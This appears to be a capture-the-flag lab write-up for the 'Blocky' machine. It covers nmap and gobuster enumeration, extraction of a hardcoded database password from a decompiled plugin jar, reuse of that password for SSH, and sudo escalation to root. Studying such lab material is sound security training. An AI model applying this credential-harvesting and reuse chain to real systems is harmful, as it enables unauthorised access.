Blocky

OS: Linux, Difficulty: Easy, IP: 10.10.10.37

Initial enumeration

# Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37
Nmap scan report for 10.10.10.37
Host is up (0.23s latency).

PORT      STATE SERVICE   VERSION
21/tcp    open  ftp       ProFTPD 1.3.5a
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open  http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   240.30 ms 10.10.14.1
2   240.22 ms 10.10.10.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds

Web-server on port 80 with default Wordpress installation running, nothing interesting, ran gobuster.

/wiki (Status: 301)
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)

/wiki and /plugins seemed interesting. Wiki had nothing but a note, however /plugins had 2 jar files.

BlockyCore.jar seemed interesting so I planned on getting the contents out of the files.

$ unzip BlockyCore.jar -d output
$ ls -laR ./output
.:
total 16
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF

./com:
total 12
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin

./com/myfirstplugin:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv  939 Jul  2  2017 BlockyCore.class

./META-INF:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv   25 Jul  2  2017 MANIFEST.MF

BlockyCore.class seemed like the only interesting file in the folders, so I went ahead and decompiled it to something readable.

$ javap -c BlockyCore.class 
--- SNIP ---
ublic com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return
--- SNIP ---

We got credentials for the mysql server root:8YsqfCTnvxAUeduzjNSXe22. These credentials did get me into the phpmyadmin interface of the server and help me fetch username notch from the wp_users list.

I tried cracking the password the user, however it was not part of the rockyou.txt wordlist so I let it be and continued with the username and passwords I had, to bruteforce my way into the SSH server.

$ ssh root@10.10.10.37
root@10.10.10.37's password: 
Permission denied, please try again.
root@10.10.10.37's password: 
# Password combination didn't work for root, however it did
# work for notch

$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ 

User own

notch@Blocky:~$ cat /home/notch/user.txt; echo
59fee***
notch@Blocky:~$ 

Root own

I noticed that we had the password for the account as well as we were part of the sudo group so I went ahead and checked the permissions we had in sudoers.

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

So we are essentially root, we can run ALL commands, as ALL users, on ALL hosts. This is game over.

notch@Blocky:~$ sudo cat /root/root.txt; echo
0a969***
notch@Blocky:~$ 

Learning outcome

Dense enumeration is the key while exploiting machines, I had nearly missed the trying the user notch with the password of root. Keeping a track of usernames and passwords is important while pen-testing.